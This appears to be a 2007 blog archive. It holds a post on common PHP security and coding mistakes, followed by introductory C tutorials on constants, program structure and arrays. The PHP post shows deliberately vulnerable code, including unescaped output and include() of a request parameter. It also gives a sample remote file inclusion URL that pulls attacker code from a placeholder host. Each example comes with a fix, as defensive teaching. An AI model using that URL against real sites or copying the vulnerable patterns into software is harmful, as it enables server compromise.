Saturday, September 8, 2007

Top 10 mistakes made repeatedly by PHP programmers.

Here are the top 10 mistakes made by PHP programmers.

1. Not escaping entities

This is basic knowledge: ALL untrusted input (especially user input from forms) has to be sanitized before it is output.

echo $_GET['username'];


Can for instance output:

It is an obvious security risk not to sanitize untrusted data before output. Besides, your pages may end up looking very messy if you do not treat user input the right way.


How to fix it:

Basically you need to convert <, >, ' and " to their proper entities (&lt;, &gt;, &#039; and &quot;). The functions htmlspecialchars() and htmlentities() do the work.

So here is the right way:

echo htmlspecialchars($_GET['username'], ENT_QUOTES);

Countless scripts have this problem.

2. Not Escaping SQL input

When querying your database, always make sure untrusted data gets escaped; otherwise your application will be unreliable and vulnerable to SQL injection. Some coders think they have covered their asses by having magic_quotes on in their php.ini. The problem is that untrusted input can come from sources other than $_GET, $_POST and $_COOKIE (crawling other websites, or using input from the database). And what happens if magic_quotes is suddenly set to Off?

How to fix it:
I recommend setting magic_quotes to Off in php.ini or through .htaccess, and then using mysql_real_escape_string() on all variables used in SQL expressions.


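<?php
// Close the double-quoted string before each function call so that the
// escaping function is actually executed and its result concatenated in.
$sql = "UPDATE users SET
name='" . mysql_real_escape_string($name) . "'
WHERE id='" . mysql_real_escape_string($id) . "'";
mysql_query($sql);
?>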

With PHP5 combined with MySQL5 you can also use prepared statements with bound parameters.

If you leave magic_quotes On you will just have to trust your instinct.

3. Wrong use of HTTP-header related functions: header(), session_start(), setcookie()

Have you ever encountered this warning? "Warning: Cannot add header information - headers already sent [....]"

Most likely you have, either during development or when deploying PHP applications. When your browser downloads a web page, the response from the server is structured in two parts: the header part and the content part.

The header consists of data that is not visible, such as cookies to be set or whether the browser should redirect to another location. The header always comes first.

The content part consists of the visible content: HTML, image data and so on.

If output_buffering is set to Off in php.ini, all header-related functions (setcookie(), header(), session_start()) must be called before the script produces any output. The problem arises when somebody develops on one platform configuration and deploys to another: then redirects stop working, and cookies and sessions are not stored...

How to fix it:
The right way is actually very simple: make your script call all header-related functions before it starts any output, and set output_buffering = Off in php.ini (on your development platform). If this is a problem in existing scripts, you can always hack around it with the output control functions.

4. Requiring and including files using untrusted data

Again and again: do not trust data you do not declare explicitly. Including and requiring files named by (but not limited to) $_GET, $_POST and $_COOKIE is a stupid and deadly path; you want to control exactly which code your server executes.

Example:
index.php

<?php
//including header, config, database connection, etc
include($_GET['filename']);
//including footer
?>

Any hacker can now request the following URL: http://www.yourdomain.com/index.php?filename=anyfile.txt

By doing so the hacker can extract confidential information and execute PHP scripts stored on the server. And if allow_url_fopen is set to On in your php.ini, you are doomed:

Try this one out:
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fwww.youaredoomed.com%2Fphphack.php

Your script will then include and parse any code that the web page at
http://www.youaredoomed.com/phphack.php outputs. That way the hacker can, for instance, send spam mails, change passwords, delete files... I have a very limited imagination.

How to fix it:
You have to control which files the script is allowed to include and which it is not allowed to include.


Note: This is only a quick fix:

<?php
//Include only files that are allowed.
$allowedFiles = array('file1.txt', 'file2.txt', 'file3.txt');
if (in_array((string)$_GET['filename'], $allowedFiles)) {
    include($_GET['filename']);
}
else {
    exit('not allowed');
}
?>



5. Syntax errors

This covers all the parse and syntax errors YOU make during development; these are probably countless, right? Usually it is a bracket, semicolon, quotation mark or parenthesis that is missing or misplaced. It is a time eater, and that is why I have put it on the list. There is only one way to fight it: become aware of which syntax errors you make and find ways to avoid repeating them! Of course a good text editor will help you a lot here; please, do not use Notepad.

6. No or little use of Object Orientation

Too many systems I have seen and worked with have this problem: they simply do not have any object orientation. Yes, objects and classes are abstract for a beginner, but if, for instance, you build a shop system without being object oriented, the source code will become unmaintainable as it grows and ages. PHP has supported basic object orientation since PHP4, and PHP5 supports a lot more and does it a lot better, so get your ass on to using it.

7. Not using a framework

95% of all development with PHP is about developing the same four things: create, edit, list and delete. To do all this in pure PHP without using a PHP MVC framework of some kind (be it home made or open source) is just plain stupid and a waste of YOUR time (of course there are exceptions, and you may have a good explanation for why you don't use a framework).

I speak from experience: there is so much PHP out there but so little use of frameworks. Get your fingers dirty now.

8. Not knowing about existing functionality

One of the strong things about PHP is that there is so much functionality available, both in the PHP core and in the pure PHP extensions. However, time and again people reinvent the wheel in their scripts. I am guilty of doing this too, but it is a waste of time exactly where you should be saving time. Even when PHP itself lacks the functionality, you can in a lot of situations save yourself time by using exec() to run a shell command.

Save yourself time by searching the manual on www.php.net and Google, keeping yourself updated on new features in upcoming releases, and asking the right people when needed.


9. Using old PHP versions

This problem primarily relates to people developing on PHP4. To put it short: you are developing on a platform that is being phased out and not using the full potential of your knowledge. Move on; there is a lot of good stuff and functionality in PHP5. And it is really not a big deal to change to PHP5: most applications need only a few modifications, or none at all, to cope with the change.

Secondly, there is the security risk of running old and unpatched software; it might end up damaging your applications.

According to Damien Seguy (founder of the French PHP portal http://www.nexen.net), 12% of all PHP servers were running PHP5 by the start of November 2006.

Read the article here (French).

So if you are developing in PHP you are most likely (88%) still doing it on PHP4. Shame on you!


10. Double escaping quotes

Have you ever seen a web page display text with \' or \" in it? It usually happens when a script written for magic_quotes off (php.ini) is deployed on a site with magic_quotes on. First PHP runs addslashes() on all GET, POST and COOKIE data, and then the script escapes the data one more time when it is stored.

Original text:
It's a string

After magic quotes on script start:
It\'s a string

On query storage:
It\\'s a string

HTML output:
It\'s a string


Another scenario that makes this occur is when a user tries to sign up and enters invalid data. The user is then presented with the same form, this time with the input escaped; when the user posts the form a second time with valid data, the input is escaped once more.

This stuff still happens way too much; however, it is mostly new and inexperienced people who run into it.

Wednesday, September 5, 2007

C Programming Language - Constants and Variables


In this tutorial you will learn about Character Set, C Character-Set Table, Special Characters, White Space, Keywords and Identifiers, Constants, Integer Constants, Decimal Integers, Octal Integers, Hexadecimal integer, Real Constants, Single Character Constants, String Constants, Backslash Character Constants [Escape Sequences] and Variables.

Instructions in the C language are formed using syntax and keywords. It is necessary to strictly follow the C language syntax rules. Any instruction that does not match the C language syntax generates an error while compiling the program. All programs must conform to the rules pre-defined in the C language. Keywords are special words which are exclusively used by the C language; each keyword has its own meaning and relevance, hence keywords should not be used as either variable or constant names.

Character Set

The character set in C Language can be grouped into the following categories.

1. Letters
2. Digits
3. Special Characters
4. White Spaces

White spaces are ignored by the compiler unless they are part of a string constant. White space may be used to separate words, but it is strictly prohibited between the characters of a keyword or identifier.

C Character-Set Table

Letters                  Digits
Upper Case A to Z        0 to 9
Lower Case a to z

Special Characters

,   Comma                &   Ampersand
.   Period               ^   Caret
;   Semicolon            *   Asterisk
:   Colon                -   Minus Sign
?   Question Mark        +   Plus Sign
'   Apostrophe           <   Opening Angle (Less than sign)
"   Quotation Marks      >   Closing Angle (Greater than sign)
!   Exclamation Mark     (   Left Parenthesis
|   Vertical Bar         )   Right Parenthesis
/   Slash                [   Left Bracket
\   Backslash            ]   Right Bracket
~   Tilde                {   Left Brace
_   Underscore           }   Right Brace
$   Dollar Sign          #   Number Sign
%   Percent Sign

White Space

1. Blank Space
2. Horizontal Tab
3. Carriage Return
4. New Line
5. Form Feed

Keywords and Identifiers

Every word in the C language is either a keyword or an identifier. Keywords cannot be used as variable names. They are reserved by the compiler for its own purposes and serve as the building blocks of a C program.

The following are the Keyword set of C language.

auto       else       register   union
break      enum       return     unsigned
case       extern     short      void
char       float      signed     volatile
const      for        sizeof     while
continue   goto       static
default    if         struct
do         int        switch
double     long       typedef

Some compilers may have additional keywords, which are listed in the compiler's C manual.

Identifiers refer to the names of user-defined variables, arrays and functions. An identifier is essentially a sequence of letters and/or digits, and it should begin with a letter.

Both uppercase and lowercase letters are permitted. The underscore character is also permitted in identifiers.


Identifiers must conform to the following rules.

1. The first character must be a letter (or underscore).
2. Identifier names must consist of only letters, digits and underscores.
3. An identifier name should have no more than 31 characters (C89 guarantees that only the first 31 characters are significant).
4. A standard C language keyword cannot be used as a variable name.
5. An identifier must not contain a space.
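
The rules above can be sketched as a small checking function. This is only an illustration: the function name is_valid_identifier and the short sample_keywords list are made up for this example, the keyword list is deliberately incomplete, and the 31-character limit is the C89 minimum rather than a limit every compiler enforces.

```c
#include <ctype.h>
#include <string.h>

/* A few keywords only, for illustration; the real list is longer. */
static const char *sample_keywords[] = { "int", "float", "while", "return" };

/* Returns 1 if name follows the identifier rules, otherwise 0. */
int is_valid_identifier(const char *name)
{
    size_t i, len = strlen(name);

    /* Rule 3: not empty and no more than 31 characters */
    if (len == 0 || len > 31)
        return 0;
    /* Rule 1: first character is a letter or underscore */
    if (!isalpha((unsigned char)name[0]) && name[0] != '_')
        return 0;
    /* Rules 2 and 5: only letters, digits and underscores (so no spaces) */
    for (i = 1; i < len; i++)
        if (!isalnum((unsigned char)name[i]) && name[i] != '_')
            return 0;
    /* Rule 4: must not be a keyword (checked against the sample list) */
    for (i = 0; i < sizeof sample_keywords / sizeof sample_keywords[0]; i++)
        if (strcmp(name, sample_keywords[i]) == 0)
            return 0;
    return 1;
}
```

Calling is_valid_identifier("Emp_name") gives 1, while "6th", "emp name" and "int" all give 0.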

Constants

A constant is a value which does not change during the execution of a program. C supports several types of constants.

1. Integer Constants
2. Real Constants
3. Single Character Constants
4. String Constants

Integer Constants

An integer constant is a sequence of digits. There are 3 types of integers namely decimal integer, octal integers and hexadecimal integer.

Decimal integers consist of a set of digits 0 to 9 preceded by an optional + or - sign. Spaces, commas and non-digit characters are not permitted between digits. Examples of valid decimal integer constants are

123
-31
0
562321
+78

Some examples for invalid integer constants are

15 750
20,000
Rs. 1000

An octal integer constant consists of any combination of digits from 0 through 7 with a 0 (zero) at the beginning. Some examples of octal integers are

026
0
0347
0676

A hexadecimal integer constant is preceded by 0X or 0x (zero followed by the letter X). It may contain the letters A to F or a to f, which stand for the decimal values 10 to 15. Examples of valid hexadecimal integers are

0X2
0X8C
0Xbcd
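
As a quick check of how the prefixes work, the sketch below returns two of the example constants so their decimal values can be compared. The function names are invented for this illustration.

```c
/* A leading 0 means base 8: 0347 = 3*64 + 4*8 + 7 = 231 */
int octal_example(void)
{
    return 0347;
}

/* A leading 0X or 0x means base 16: 0X8C = 8*16 + 12 = 140 */
int hex_example(void)
{
    return 0X8C;
}

/* Without a prefix the constant is read in base 10 */
int decimal_example(void)
{
    return 231;
}
```

Here octal_example() and decimal_example() return the same value, because 0347 and 231 are two spellings of one number.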

Real Constants

Real constants contain a fractional part in their representation. Integer constants are inadequate to represent quantities that vary continuously. These quantities are represented by numbers containing fractional parts, like 26.082. Examples of real constants are

0.0026
-0.97
435.29
+487.0

Real numbers can also be represented in exponential notation. The general form for exponential notation is mantissa e exponent, written without spaces; the letter e may be in upper or lower case. The mantissa is either a real number expressed in decimal notation or an integer. The exponent is an integer with an optional plus or minus sign.
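
A few constants in exponential notation, sketched as small functions so the values can be inspected. The function names and the particular numbers are chosen only for illustration.

```c
/* Mantissa 2.5, exponent 3: 2.5 * 10^3 = 2500.0 */
double large_value(void)
{
    return 2.5e3;
}

/* An integer mantissa is allowed too: 75 * 10^4 = 750000.0 */
double integer_mantissa(void)
{
    return 75E4;
}

/* A negative exponent gives a small number: 1.5 * 10^-2 = 0.015 */
double small_value(void)
{
    return 1.5e-2;
}
```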

Single Character Constants

A single character constant represents a single character enclosed in a pair of single quotation marks.

Examples of character constants are

'5'
'x'
';'
' '

All character constants have an equivalent integer value, which is called the ASCII value.
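
The sketch below shows the integer value behind a character constant. It assumes a system that uses the ASCII character set, and the function names are hypothetical.

```c
/* Returns the integer value stored for a character constant. */
int char_code(char c)
{
    return (int)c;
}

/* Digit characters are stored in consecutive order, so subtracting '0'
   turns the character '5' into the number 5. */
int digit_value(char c)
{
    return c - '0';
}
```

On an ASCII system char_code('5') is 53, whereas digit_value('5') is 5: the character '5' and the number 5 are different values.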

String Constants

A string constant is a sequence of characters enclosed in double quotation marks. The characters in a string constant may be letters, digits, special characters and blank spaces. Examples of string constants are

"VISHAL"
"1234"
"God Bless"
"!.....?"

Backslash Character Constants [Escape Sequences]

Backslash character constants are special characters used in output functions. Although they are written with two characters, they represent only one character. Given below is the table of escape sequences and their meanings.

Constant   Meaning
'\a'       Audible Alert (Bell)
'\b'       Backspace
'\f'       Form Feed
'\n'       New Line
'\r'       Carriage Return
'\t'       Horizontal Tab
'\v'       Vertical Tab
'\''       Single Quote
'\"'       Double Quote
'\?'       Question Mark
'\\'       Backslash
'\0'       Null
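
To see that each escape sequence really counts as one character, the sketch below measures two strings with strlen(). The function names are made up for this example.

```c
#include <string.h>

/* "a\tb\n" holds four characters: 'a', tab, 'b' and newline. */
size_t tab_newline_length(void)
{
    return strlen("a\tb\n");
}

/* The null character '\0' marks the end of a string, so strlen()
   stops counting at it and never sees "def". */
size_t length_up_to_null(void)
{
    return strlen("abc\0def");
}
```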

Variables

A variable holds a value that can change at any time. It is a memory location used to store a data value. A variable name should be chosen carefully by the programmer so that it reflects the variable's use throughout the program. Variable names are case sensitive. Examples of variable names are

Sun
number
Salary
Emp_name
average1

Any variable declared in a program should conform to the following

1. It must begin with a letter, although underscore is also permitted as the first character.
2. Its name should be kept short: very old compilers recognized only the first 8 characters, and C89 guarantees only the first 31.
3. White space is not allowed.
4. It must not be a keyword.
5. It must not contain any special characters other than the underscore.

Examples of Invalid Variable names are

123
(area)
6th
%abc

C programming Basics

C Programming Language - An Overview

In this tutorial you will learn about the C Programming Language: Overview of C, Sample program - Printing a message, Executing a C Program and Basic structure of C programs.

Overview of C

C is a programming language. It is one of the most popular computer languages today because it is a structured, high-level, machine-independent language. Programmers need not worry about the hardware platform on which their programs will run.

Dennis Ritchie invented the C language. Before that, Ken Thompson had created a language called B, which was based on a language known as BCPL. B was created in 1970, basically for the Unix operating system. Dennis Ritchie used ALGOL, BCPL and B as the reference languages from which he created C.

C has many qualities which any programmer may desire. It combines the capability of assembly language with the features of a high-level language, so it can be used for creating software packages, system software and so on. It supports the programmer with a rich set of built-in functions and operators. C is highly portable: programs written on one computer can run on another with little or no change. Structured programming is well supported in C, which helps in dividing programs into function modules or code blocks.

Sample program-1
Printing a message
Consider the following program

#include <stdio.h>
int main(void)
{
    /* Printing begins here */
    printf("C is a very good programming language.");
    /* Printing ends here */
}


The first line is a preprocessor command which adds the stdio header file to our program. stdio stands for standard input/output; this header file supports the input and output functions in a program.

In a program, we need to provide input data and display processed data on the standard output, the screen. The stdio.h header file supports these two activities. There are many other header files, which will be discussed in future.

The second line, containing main(), tells the compiler that this is the starting point of the program; every program must have the main function exactly once. The opening and closing braces indicate the beginning and end of the function. All the statements between these two braces form the function body. These statements are the actual C code which tells the computer to do something. Each statement is an instruction for the computer to perform a specific task.

The /* .... */ is a comment and will not be executed; the compiler simply ignores it. Comments are valuable because they enhance the readability and understandability of the program. It is a very good practice to include comments in all programs so that readers can understand what is being done.

The next statement, the printf() statement, is the only executable line in the above sample program. The printf() function is a standard built-in function for printing the text which appears inside the double quotes. Therefore on the standard output device we can see the following line

C is a very good programming language.

The next line is again a comment, as explained earlier. The closing brace indicates the end of the program.


======================================

Executing a C Program

The following basic steps are carried out in executing a C program.

1. Type the C language program.

2. Store the program by giving it a suitable name followed by the extension .c

3. Compile the program.

4. Debug the errors, if any, that are displayed during compilation.

5. Run the program.

Basic structure of C programs



Documentation Section

Link Section

Definition Section

Global declaration Section

main() function section
{
    Declaration Section

    Executable Section
}

Sub-program Section

function1
{
    Statements
}

function2
{
    Statements
}

function3
{
    Statements
}

The documentation section consists of a set of comment lines giving the name of the program, the author and other details such as a short description of the purpose of the program.

The link section provides instructions to the compiler to link functions from the system library.

The definition section defines all the symbolic constants. The variables can be declared inside the main function or before the main function.

Declaring the variables before the main function makes the variables accessible to all the functions in a C language program, such variables are called Global Variables.

Declaring the variables within main function makes the usage of the variables confined to the main function only and it is not accessible outside the main function.

Every C program must have one main function. Enclosed in the main function are the declaration and executable parts.

In the declaration part we have all the variables.

There is at least one statement in the executable part.

The two parts must appear between the opening and closing braces.

The sub-program section contains all the user-defined functions that are called in the main function.

User-defined functions are generally placed immediately after the main function although they may appear in any order.

C Programming - Arrays

In this tutorial you will learn about C Programming - Arrays - Declaration of arrays, Initialization of arrays, Multi dimensional Arrays, Elements of multi dimension arrays and Initialization of multidimensional arrays.

The C language provides a capability that enables the user to define a set of ordered data items known as an array.

Suppose we have a set of grades that we wish to read into the computer, and suppose we wish to perform some operations on these grades. We will quickly realize that declaring each and every student grade as a separate variable would be quite a tedious task, especially since there may be a very large number of them.

In C we can define a variable called grades, which represents not a single grade but an entire set of grades. Each element of the set can then be referenced by means of a number called the index or subscript.

Declaration of arrays:

Like any other variable, arrays must be declared before they are used. The general form of declaration is:

type variable-name[size];

The type specifies the type of the elements that will be contained in the array, such as int, float or char, and the size indicates the maximum number of elements that can be stored inside the array. For example:

float height[50];

Declares height to be an array containing 50 real elements. Any subscript from 0 to 49 is valid. In C, array subscripts begin with zero, so height[0] refers to the first element of the array. (For this reason, it is easier to think of it as referring to element number zero, rather than as referring to the first element.)

An individual array element can be used anywhere that a normal variable can, with a statement such as

g = grades[50];

The statement assigns the value stored at index 50 of the array to the variable g.
More generally, if i is declared to be an integer variable, then the statement g = grades[i];
will take the value contained in element number i of the grades array and assign it to g. So if i were equal to 7 when the above statement is executed, then the value of grades[7] would be assigned to g.

A value is stored into an element of the array simply by specifying the array element on the left-hand side of the equals sign. In the statement

grades[100] = 95;

the value 95 is stored into element number 100 of the grades array.
The ability to represent a collection of related data items by a single array enables us to develop concise and efficient programs. For example, we can very easily sequence through the elements of the array by varying the value of the variable that is used as a subscript. So the for loop

for (i = 0; i < 100; ++i)
    sum = sum + grades[i];

will sequence through the first 100 elements of the array grades (elements 0 to 99) and will add the value of each grade into sum. When the for loop is finished, the variable sum will contain the total of the first 100 values of the grades array (assuming sum was set to zero before the loop was entered).
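
The summing loop can be wrapped in a small function, sketched below. The name sum_grades and its count parameter are not part of the tutorial; they are introduced here so the loop can be tried on arrays of any length.

```c
/* Adds up the first count elements of grades and returns the total. */
int sum_grades(const int grades[], int count)
{
    int i;
    int sum = 0;            /* must start at zero before the loop */

    for (i = 0; i < count; ++i)
        sum = sum + grades[i];
    return sum;
}
```

With an array holding 90, 80, 70, 60 and 50, sum_grades(grades, 5) returns 350.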

In addition to integer constants, integer-valued expressions can also be used inside the brackets to reference a particular element of the array. So if low and high were defined as integer variables, then the statement

next_value = sorted_data[(low + high) / 2]; would assign to the variable next_value the element indexed by evaluating the expression (low + high) / 2. If low were equal to 1 and high were equal to 9, then the value of sorted_data[5] would be assigned to next_value; and if low were equal to 1 and high were equal to 10, then the value of sorted_data[5] would also be referenced, because integer division discards the fractional part.
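
The subscript calculation on its own looks like this; middle_index is a hypothetical helper name used only for this sketch.

```c
/* Integer division discards the remainder, so 10 / 2 and 11 / 2
   both give 5. */
int middle_index(int low, int high)
{
    return (low + high) / 2;
}
```

Both middle_index(1, 9) and middle_index(1, 10) return 5, which is why both cases refer to sorted_data[5].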

Just like variables, arrays must be declared before they are used. The declaration of an array states the type of the elements that will be contained in the array, such as int, float or char, as well as the maximum number of elements that will be stored inside it. The C system needs this latter information in order to determine how much memory space to reserve for the particular array.

The declaration int values[10]; would reserve enough space for an array called values that could hold up to 10 integers. The layout below shows the reserved storage space.

values[0]
values[1]
values[2]
values[3]
values[4]
values[5]
values[6]
values[7]
values[8]
values[9]

The array values stored in memory.

Initialization of arrays:

We can initialize the elements of an array when it is declared, in the same way as ordinary variables. The general form of initialization of arrays is:

type array_name[size]={list of values};

The values in the list are separated by commas. For example, the statement

int number[3]={0,0,0};

will declare number as an array of size 3 and will assign zero to each element. If the number of values in the list is less than the number of elements, then only that many elements are initialized from the list. The remaining elements will be set to zero automatically.

In the declaration of an array the size may be omitted; in such cases the compiler allocates enough space for all the initialized elements. For example, the statement

int counter[]={1,1,1,1};

will declare the array counter to contain four elements with the initial value 1. This approach works fine as long as we initialize every element in the array.

The initialization of arrays in C suffers from two drawbacks
1. There is no convenient way to initialize only selected elements.
2. There is no shortcut method to initialize large number of elements.
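
Two of the initialization rules can be checked with a short sketch. The function names and the values 7 and 9 are chosen only for this example.

```c
#include <stddef.h>

/* Only the first two of five elements are listed; the function returns 1
   when the remaining three were set to zero automatically. */
int partial_init_is_zero_filled(void)
{
    int number[5] = {7, 9};

    return number[2] == 0 && number[3] == 0 && number[4] == 0;
}

/* With the size omitted, the compiler counts the values in the list.
   Dividing the size of the array by the size of one element gives
   the number of elements. */
size_t counter_length(void)
{
    int counter[] = {1, 1, 1, 1};

    return sizeof counter / sizeof counter[0];
}
```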

/* Program to count the number of positive and negative numbers */
#include <stdio.h>

int main(void)
{
    int a[50], n, count_neg = 0, count_pos = 0, i;

    printf("Enter the size of the array\n");
    /* The array holds at most 50 elements, so reject any other size */
    if (scanf("%d", &n) != 1 || n < 0 || n > 50)
        return 1;
    printf("Enter the elements of the array\n");
    for (i = 0; i < n; i++)
        scanf("%d", &a[i]);
    for (i = 0; i < n; i++)
    {
        if (a[i] < 0)
            count_neg++;
        else if (a[i] > 0)   /* zero is neither positive nor negative */
            count_pos++;
    }
    printf("There are %d negative numbers in the array\n", count_neg);
    printf("There are %d positive numbers in the array\n", count_pos);
    return 0;
}

Multi dimensional Arrays:

Often there is a need to store and manipulate two dimensional data structures such as matrices and tables. Here the array has two subscripts: one subscript denotes the row and the other the column.
The declaration of two dimensional arrays is as follows:

data_type array_name[row_size][column_size];
int m[10][20];

Here m is declared as a matrix having 10 rows (numbered 0 through 9) and 20 columns (numbered 0 through 19). The first element of the matrix is m[0][0] and the element in the last row and last column is m[9][19].

Elements of multi dimension arrays:

A 2 dimensional array marks[4][3] is shown in the figure below. The first element, marks[0][0], contains 35.5, the second element, marks[0][1], contains 40.5, and so on.

marks[0][0]   marks[0][1]   marks[0][2]
35.5          40.5          45.5

marks[1][0]   marks[1][1]   marks[1][2]
50.5          55.5          60.5

marks[2][0]   marks[2][1]   marks[2][2]

marks[3][0]   marks[3][1]   marks[3][2]

Initialization of multidimensional arrays:

Like one dimensional arrays, 2 dimensional arrays may be initialized by following their declaration with a list of initial values enclosed in braces.

Example:

int table[2][3]={0,0,0,1,1,1};

initializes the elements of the first row to zero and of the second row to 1. The initialization is done row by row. The above statement can be equivalently written as

int table[2][3]={{0,0,0},{1,1,1}};

by surrounding the elements of each row with braces.
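
The equivalence of the flat and the row-by-row initializer lists can be checked with a sketch like the following. The function and array names are invented for this illustration, and some compilers may warn about the missing inner braces in the flat form.

```c
/* Returns 1 if the flat list and the row-by-row list fill a 2 x 3
   table with the same values. */
int initializers_match(void)
{
    int flat[2][3] = {0, 0, 0, 1, 1, 1};
    int nested[2][3] = {{0, 0, 0}, {1, 1, 1}};
    int row, col;

    for (row = 0; row < 2; row++)
        for (col = 0; col < 3; col++)
            if (flat[row][col] != nested[row][col])
                return 0;
    return 1;
}

/* Adds up one row of the table: row 0 holds zeros, row 1 holds ones. */
int row_sum(int row)
{
    int table[2][3] = {{0, 0, 0}, {1, 1, 1}};
    int col, sum = 0;

    for (col = 0; col < 3; col++)
        sum = sum + table[row][col];
    return sum;
}
```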

C allows arrays of three or more dimensions. The maximum number of dimensions depends on the compiler. The general form of a multidimensional array declaration is:

data_type array_name[s1][s2][s3]...[sn];

where si is the size of the ith dimension. Some examples are:

int survey[3][5][12];
float table[5][4][5][3];

survey is a 3 dimensional array declared to contain 180 integer elements (3 x 5 x 12). Similarly, table is a four dimensional array containing 300 elements of floating point type (5 x 4 x 5 x 3).
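
The element counts can be confirmed by dividing the size of the whole array by the size of one element, as in this sketch. The function names are hypothetical.

```c
#include <stddef.h>

/* 3 * 5 * 12 elements of type int */
size_t survey_elements(void)
{
    int survey[3][5][12];

    return sizeof survey / sizeof(int);
}

/* 5 * 4 * 5 * 3 elements of type float */
size_t table_elements(void)
{
    float table[5][4][5][3];

    return sizeof table / sizeof(float);
}
```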

/* Example program to add two matrices and store the result in a third matrix */
#include <stdio.h>

int main(void)
{
    int a[10][10], b[10][10], c[10][10], i, j, m, n, p, q;

    printf("Enter the order of matrix a and the order of matrix b\n");
    if (scanf("%d%d%d%d", &m, &n, &p, &q) != 4)
        return 1;
    /* Both matrices must have the same order and fit in the 10 x 10 arrays */
    if (m == p && n == q && m >= 1 && m <= 10 && n >= 1 && n <= 10)
    {
        printf("Matrices can be added\n");
        printf("Enter the elements of matrix a\n");
        for (i = 0; i < m; i++)
            for (j = 0; j < n; j++)
                scanf("%d", &a[i][j]);
        printf("Enter the elements of matrix b\n");
        for (i = 0; i < p; i++)
            for (j = 0; j < q; j++)
                scanf("%d", &b[i][j]);
        printf("The sum of matrices a and b is\n");
        for (i = 0; i < m; i++)
            for (j = 0; j < n; j++)
                c[i][j] = a[i][j] + b[i][j];
        for (i = 0; i < m; i++)
        {
            for (j = 0; j < n; j++)
                printf("%d\t", c[i][j]);   /* print the sum, not an address */
            printf("\n");
        }
    }
    else
        printf("Matrices cannot be added\n");
    return 0;
}